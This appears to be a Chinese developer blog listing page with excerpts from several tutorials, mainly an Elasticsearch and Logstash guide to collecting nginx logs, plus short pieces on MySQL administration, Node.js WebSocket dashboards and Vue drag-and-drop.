...系统中异步采集非业务数据并进行分析？ 1. 为什么我们需要异步采集非业务数据？嘿，朋友们！今天咱们聊聊一个特别有用的技术——Elasticsearch，以及如何利用它来处理那些不在核心业务流程中的数据。你可能想问：“这有啥了不起的？”让我来告诉你，当你得去扒拉日志、监控指标这些非业务数据时，Elasticsearch 真的就像是你的救命稻草。想象一下，你有一个电商网站，每天都有大量的用户访问、购买商品。不过呢，除了这些基本的交易数据，你是不是还想知道用户都是怎么逛你的网站的，他们在每个页面上花了多长时间啊？这些数据虽然不会直接让销售额飙升，但对提升用户体验和改进产品设计可是大有裨益。这就是我们为什么要异步采集非业务数据的原因。 2. 选择合适的数据采集工具既然要采集非业务数据，那么选择合适的工具就显得尤为重要了。这里有几个流行的开源工具可以考虑： - Logstash: 它是Elastic Stack的一部分，专门用于日志收集。 - Fluentd: 一个开源的数据收集器，支持多种数据源。 - Telegraf: 一款轻量级的代理，用于收集各种系统和应用的度量数据。这些工具各有特点，可以根据你的具体需求选择最适合的一个。比如，假如你的数据主要来自日志文件，那Logstash绝对是个好帮手；但要是你需要监控的是系统性能指标，那Telegraf可能会更对你的胃口。 3. 配置Elasticsearch以接收数据接下来，我们要确保Elasticsearch已经配置好，能够接收来自不同数据源的数据。首先，你需要安装并启动Elasticsearch。假设你已经安装好了，接下来要做的就是配置索引模板（Index Template）。 json PUT _template/my_template { "index_patterns": ["my-index-"], "settings": { "number_of_shards": 1, "number_of_replicas": 1 }, "mappings": { "_source": { "enabled": true }, "properties": { "timestamp": { "type": "date" }, "message": { "type": "text" } } } } 上面这段代码定义了一个名为my_template的模板，适用于所有以my-index-开头的索引。这个模板里头设定了索引的分片数和副本数，还定义了两个字段：一个存时间戳叫timestamp，另一个存消息内容叫message。 4. 使用Logstash采集数据现在我们有了Elasticsearch，也有了数据采集工具，接下来就是让它们协同工作。这里我们以Logstash为例，看看如何将日志数据采集到Elasticsearch中。首先，你需要创建一个Logstash配置文件（.conf），指定输入源、过滤器和输出目标。 conf input { file { path => "/var/log/nginx/access.log" start_position => "beginning" } } filter { grok { match => { "message" => "%{COMBINEDAPACHELOG}" } } date { match => [ "timestamp", "dd/MMM/yyyy:HH:mm:ss Z" ] } } output { elasticsearch { hosts => ["localhost:9200"] index => "nginx-access-%{+YYYY.MM.dd}" } } 这段配置文件告诉Logstash从/var/log/nginx/access.log文件读取数据，使用Grok过滤器解析日志格式，然后将解析后的数据存入Elasticsearch中。这里的hosts参数指定了Elasticsearch的地址，index参数定义了索引的命名规则。 5. 实战演练分析数据最后，让我们来看看如何通过Elasticsearch查询和分析这些数据。好了，假设你已经把日志数据成功导入到了Elasticsearch里，现在你想看看最近一天内哪些网址被访问得最多。 bash GET /nginx-access-/_search { "size": 0, "aggs": { "top_pages": { "terms": { "field": "request", "size": 10 } } } } 这段查询语句会返回过去一天内访问量最高的10个URL。通过这种方式，你可以快速获取关键信息，从而做出相应的决策。 6. 总结与展望通过这篇文章，我们学习了如何使用Elasticsearch异步采集非业务数据，并进行了简单的分析。这个过程让我们更懂用户的套路，还挖出了不少宝贝，帮我们更好地升级产品和服务。当然，实际操作中可能会遇到各种问题和挑战，但只要保持耐心，不断实践和探索，相信你一定能够掌握这项技能。希望这篇教程能对你有所帮助，如果你有任何疑问或者建议，欢迎随时留言交流！ --- 好了，朋友们，今天的分享就到这里。希望你能从中获得灵感，开始你的Elasticsearch之旅。记住，技术的力量在于应用，让我们一起用它来创造更美好的世界吧！

2024-12-29 16:00:49

飞鸟与鱼_

NodeJS

Node.js+Express搭建HTTP服务/ws库实现WebSocket通信构建客户端-服务器实时监控面板

...年来，随着物联网和大数据技术的飞速发展，实时监控系统的需求日益增长。特别是在工业制造领域，企业需要对生产线上的各种参数进行实时监测，以确保产品质量和生产效率。例如，某知名汽车制造商近期宣布在其全球多个工厂部署基于 Node.js 和 WebSocket 的实时监控平台，该平台不仅能够实时采集生产设备的运行数据，还能通过智能算法预测潜在故障，从而大幅降低维护成本并提高生产稳定性。此外，在医疗健康行业，类似的实时监控解决方案也开始崭露头角。一家专注于远程医疗的初创公司最近推出了一款基于 Node.js 的健康管理应用，用户可以通过佩戴智能手环等设备，将心率、血压等生理指标实时上传至云端，医生则可随时随地查看患者的健康状况并提供个性化建议。这一创新模式不仅改善了医疗服务的可及性，也为慢性病管理带来了新的可能性。值得注意的是，随着《个人信息保护法》等相关法律法规的出台，企业在开发此类实时监控系统时必须格外注意数据安全与隐私保护。一方面，企业需要严格遵守数据收集、存储和传输的相关规定；另一方面，还需加强技术手段，如加密通信、匿名化处理等，以防止敏感信息泄露。正如某网络安全专家所言：“技术本身没有善恶之分，关键在于如何正确使用。”因此，在追求技术创新的同时，企业应当始终将合规性和安全性放在首位，确保技术进步真正造福于社会。总之，Node.js 和 WebSocket 技术的应用前景十分广阔，但同时也面临着诸多挑战。只有不断探索新技术、新方法，同时坚守法律底线和社会责任，才能让这一技术更好地服务于各行各业的发展需求。

2025-05-06 16:24:48

清风徐来

MySQL

怎么打开mysql新建数据库

...L是一个开源的关系型数据库管理系统，由Oracle公司开发并维护。在本文的语境中，MySQL被用于存储和管理结构化数据，用户可通过SQL语言实现对数据库的各种操作，如新建、查询、更新和删除数据等。MySQL因其稳定、高效、可扩展性强以及支持多种操作系统平台而被广泛应用于网站开发、企业级应用系统以及各种需要持久化存储数据的应用场景。关系型数据库管理系统(RDBMS) , 关系型数据库管理系统是一种建立在关系模型基础上的软件系统，它能通过表格、列和行的形式来组织、存储和管理数据，并利用SQL（Structured Query Language）语句进行数据操作。在文章中，MySQL即是一个典型的关系型数据库管理系统，通过它可以创建多个相互关联的数据库，确保数据的一致性和完整性。 SQL , SQL（Structured Query Language）是一种标准化的编程语言，用于管理和处理关系型数据库中的数据。在本文所描述的MySQL环境中，用户使用SQL命令来与数据库交互，例如“CREATE DATABASE”用于创建新的数据库，“SHOW DATABASES”则用于查看所有已存在的数据库列表。SQL语言不仅包括数据定义语言（DDL，如创建表或数据库），还包括数据操作语言（DML，如插入、更新和删除记录）以及数据查询语言（DQL，如SELECT语句）。

2023-08-12 18:53:34

138

码农

MySQL

怎样将mysql数据导入mysql

在进行MySQL数据迁移或导入导出操作时，除了上述基本步骤外，了解一些进阶技巧和最新动态将有助于提升工作效率和确保数据安全。近期，MySQL 8.0版本推出了一系列改进，例如增强的并行复制功能，能够显著加快大规模数据迁移的速度。同时，MySQL团队也优化了mysqldump工具，支持更多参数选项以适应不同场景需求，如--single-transaction参数可在保证数据一致性的同时进行在线备份。此外，在处理敏感信息时，MySQL企业版提供了加密功能，可以对导出的数据文件进行加密处理，保障数据在传输过程中的安全性。而对于数据库表结构复杂、数据量庞大的情况，采用分批次导入或者利用中间过渡表的方式可有效避免内存溢出等问题。值得注意的是，随着云服务的普及，许多云服务商（如AWS RDS、阿里云RDS等）提供了便捷的数据迁移服务，用户可以直接通过控制台界面完成MySQL数据库之间的迁移任务，极大简化了操作流程，并具备良好的容灾备份能力。深入解读方面，对于那些需要频繁进行数据库同步的企业来说，熟悉并掌握Percona Toolkit、pt-online-schema-change等第三方工具也是必不可少的，它们能够在不影响业务的情况下实现在线修改表结构和数据迁移。综上所述，MySQL数据导入导出是一个涉及广泛且不断演进的话题，结合最新技术发展与最佳实践，不仅可以提高日常运维效率，还能更好地应对各类复杂的数据库管理挑战。

2023-02-12 10:44:09

数据库专家

MySQL

怎样查看mysql的账户和密码

...L是一个开源的关系型数据库管理系统（RDBMS），广泛应用于网站和应用程序开发中，以处理和存储结构化数据。在本文的上下文中，MySQL是用于存储用户账号和密码信息的数据库系统，通过命令行工具或相关管理界面可以进行账户管理和密码操作。密码哈希值 , 密码哈希值是在密码学领域中，将原始密码通过特定算法（如SHA-1、SHA-256等）进行单向加密后的结果。在MySQL数据库中，为了保护用户密码的安全性，实际存储的是密码经过哈希运算后的哈希值而非明文密码。当用户登录时，输入的密码也会经过相同的哈希算法处理，然后与数据库中存储的哈希值进行对比验证，而不是直接比对密码原文。最小权限原则 , 最小权限原则是数据库安全管理中的基本原则之一，指的是每个数据库用户（账号）仅被赋予完成其工作所需任务的最小权限，避免因权限过大导致的数据泄露或破坏。在本文提到的MySQL账号管理实践中，管理员应遵循这一原则，只给每个用户分配必要的访问和操作权限，例如，只允许查询某些表的用户无权修改或删除数据，以此提高数据库系统的安全性。

2024-01-21 10:37:36

算法侠

VUE

vue同级拖拽

...度重视。此外，对于数据驱动的拖拽排序场景，如看板应用、列表管理等，开发者还可以结合使用诸如Vuex的状态管理工具进行深度定制，确保拖拽操作带来的状态变更在整个应用中得到同步更新，从而实现流畅且一致的用户体验。值得关注的是，随着Web技术的发展和WebAssembly等新技术的兴起，未来的前端拖放功能可能会更加丰富多样，不仅限于DOM元素层面的操作，甚至可以拓展到富媒体、3D模型等领域，为用户提供更加沉浸式和直观的交互方式。综上所述，无论是Vue.js的同级拖拽功能还是其他前端框架的相关特性，都在持续推动Web应用程序朝着更加高效、易用的方向发展。了解并掌握这些技术，无疑将有助于开发者构建出更具吸引力和竞争力的Web产品。

2023-02-06 14:33:08

118

键盘勇士

MySQL

怎么查mysql的版本号

关系型数据库管理系统 , 关系型数据库管理系统（RDBMS）是一种基于关系模型的数据库管理系统，它以表格的形式存储数据，并通过预定义的关系结构来组织和管理这些数据。在MySQL中，数据以行和列的形式存储在表中，且不同表之间可通过键值关联形成复杂的查询和数据交互，确保了数据的一致性、完整性和高效访问。 MySQL命令行客户端 , MySQL命令行客户端是MySQL提供的一个用于直接与MySQL服务器交互的文本界面工具。用户可以通过输入SQL语句来执行各种数据库操作，如创建数据库、表，插入、修改和删除数据，以及查询数据库版本等。在本文上下文中，开发者或管理员使用MySQL命令行客户端输入特定的SQL命令“SELECT VERSION();”来查询MySQL服务器的当前版本号。 Web应用程序 , Web应用程序是一种运行于网络服务器上并通过HTTP协议与用户的Web浏览器进行交互的应用程序。用户通过浏览器访问Web应用程序，可以查看、提交信息或者进行其他复杂的数据处理任务。在开发Web应用程序时，MySQL作为后台数据库系统被广泛采用，用于存储和管理应用程序需要处理的各种数据。例如，电子商务网站可能利用MySQL来存储商品信息、订单记录、用户账户等数据，确保了数据的安全存储和高效检索。

2023-10-03 21:22:15

106

软件工程师

MySQL

怎么dos启动mysql数据库

...流程来开启MySQL数据库： 1. 开启指令行终端，进入MySQL的bin文件夹 cd /d C:\Program Files\MySQL\MySQL Server 8.0\bin 2. 执行以下指令来开启MySQL服务端 mysqld --console 3. 等候MySQL服务端开启结束，可以看到类似以下显示信息 2022-01-03T02:11:00.880724Z 0 [System] [MY-010116] [Server] C:\Program Files\MySQL\MySQL Server 8.0\bin\mysqld.exe (mysqld 8.0.29) starting as process 908 4. 开启新的指令行终端，进入MySQL的bin文件夹 cd /d C:\Program Files\MySQL\MySQL Server 8.0\bin 5. 执行以下指令来连接到MySQL服务端 mysql -u root -p 6. 输入MySQL的root用户密码，进入MySQL指令行界面 Enter password: 7. 成功连接到MySQL服务端后，可以执行各种MySQL指令来管理数据库了通过以上流程，就可以在Windows操作OS下成功地开启MySQL数据库，并进入MySQL指令行界面来管理数据库了。

2023-12-12 11:10:15

135

数据库专家

MySQL

怎样打开mysql数据库服务

关系型数据库管理系统 , 关系型数据库管理系统（RDBMS）是一种用于存储、管理和检索数据的软件系统，其数据按照表格的形式组织，并通过预定义的关系连接在一起。在MySQL中，数据以行和列的形式存储在表内，且支持SQL（结构化查询语言）进行数据操作，如插入、更新、删除和查询等。结合文章语境，MySQL作为一个流行的关系型数据库管理系统，因其开放源代码和高度稳定性而被广泛应用于企业应用中。终端（Terminal） , 终端在本文中的含义是操作系统提供的命令行界面，用户可以通过输入特定指令与系统交互，执行各种操作，如启动服务、管理文件等。在Linux环境下启动MySQL服务时，用户需要打开终端并输入相应的命令来启动或停止MySQL服务。 sudo命令 , sudo是一个在Unix/Linux操作系统中广泛使用的命令，全称为“SuperUser DO”，即超级用户执行。当普通用户使用sudo命令时，可以在经过系统权限验证后，暂时获得管理员权限去执行原本需要更高权限才能执行的命令。在启动或停止MySQL服务的过程中，由于涉及系统服务管理，因此需要通过sudo命令获取管理员权限来执行相应的启动/停止脚本。

2023-10-18 17:15:18

电脑达人

知识学习

实践的时候请根据实际情况谨慎操作。

随机学习一条linux命令：

lsof -i :port_number - 查找占用指定端口的进程。